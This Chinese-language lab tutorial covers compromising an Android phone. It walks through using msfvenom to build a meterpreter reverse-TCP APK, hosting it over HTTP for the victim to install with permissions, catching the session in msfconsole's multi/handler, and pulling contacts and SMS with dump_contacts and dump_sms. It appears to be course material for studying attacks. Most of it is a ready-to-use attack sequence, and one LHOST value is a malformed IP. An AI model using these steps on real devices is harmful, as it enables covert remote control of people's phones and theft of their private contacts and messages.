第二天-03-安卓手机的入侵实验

安卓手机入侵实验

要求：

电脑主机与手机模拟器或者真机在当前环境下，网络是畅通的，相互之间可以进行通信。

如何进行测试网络环境：

我们首先需要确定IP。

linux通过终端命令 # ip a 或者 #ifconfig

windown下：win加r输入cmd调出终端，使用ipconfig查看ip地址。

kali下：

Android模拟器下：

在安卓真机下：打开wifi

操作：

知道IP后使用ping命令测试是否可以连通。

终端下命令：

​ ping 目标主机ip

测试步骤：

可以ping通后开始进行入侵测试：

1. 使用msfvenom生成一个连接kali主机的apk安卓应用

lhost=192.168.1.10 （这是Kali的IP），lport=4444 （默认4444）端口，1.apk（生成apk的名字）

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.116.1354 lport=4444 R > 1.apk

home下点开test

apk安卓应用上传到安卓手机

步骤一：kali开启HTTP服务80端口

命令：

​ python3 -m http.server 80

​ 步骤二：安卓下通过ip访问网站下载

​ 模拟器下有bug可以通过

终端下命令：切换路径 cd /sdcard

开始下载 wget ip/apk文件

真机可以直接浏览器下输入ip地址访问

安卓下载安装完成并且给与程序权限

​ 3. 回到kali

​ 输入命令启动msfconsole

4. 选择工具模块

   命令：

   use exploit/multi/handler

   

   5. 设置攻击载荷

      set payload android/meterpreter/reverse_tcp

6. 设置监听方ip地址（kali的IP地址）

   set LHOST ip

   

7. 设置端口

   set LPORT 4444

   

8. run运行

9. 回到安卓点击安装的程序

10. kali下可以执行操作了

    查看目标安卓手机通讯录：dump_contacts

    

完成后的文件保存在home，目录下

​ 查看目标手机短信 ：dump_sms

至此操作完成

补充：

可以使用help 查看命令帮助